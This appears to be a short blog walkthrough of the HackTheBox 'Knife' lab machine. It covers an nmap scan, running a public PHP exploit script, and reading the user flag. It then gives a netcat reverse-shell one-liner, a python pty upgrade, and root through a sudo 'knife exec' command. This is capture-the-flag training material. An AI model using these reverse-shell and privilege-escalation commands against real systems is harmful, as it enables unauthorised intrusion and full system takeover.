HackTheBox : Knife Walkthrough

Al1z4deh:~# echo "Welcome"
2 min readAug 29, 2021

--

Step 1:

Let’s scan for open ports with Nmap

Command: nmap -A 10.10.10.242

Step 2:

I couldn’t find anything definitive from the port scan. Accordingly, let’s look at the traffic network with burp suite

Here we see the version of php. Now let’s find the appropriate exploit for this version.

Let’s look at the first

Now, let’s download this exploit and start the infiltration process.

Step 3:

Command: python3 49933.py

Good, we’re inside now.

Let’s look at who we are and all the files.

Command: whoami

Command: find

Let’s look inside this file.

Command: cat ./home/james/user.txt

Findout the user flag and submit to htb.

Get root

Let’s get in touch between the first target car and our own car

Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ip1234 >/tmp/f

Create an interactive terminal with python

Command: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Get root and find the flag

Command: sudo /usr/bin/knife exec — exec “exec ‘/bin/sh -i ’ ”

Get the root and find the flag

Findout the rootflag and submit to htb.

Good h4cks)

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

Al1z4deh:~# echo "Welcome"
Al1z4deh:~# echo "Welcome"

No responses yet

Write a response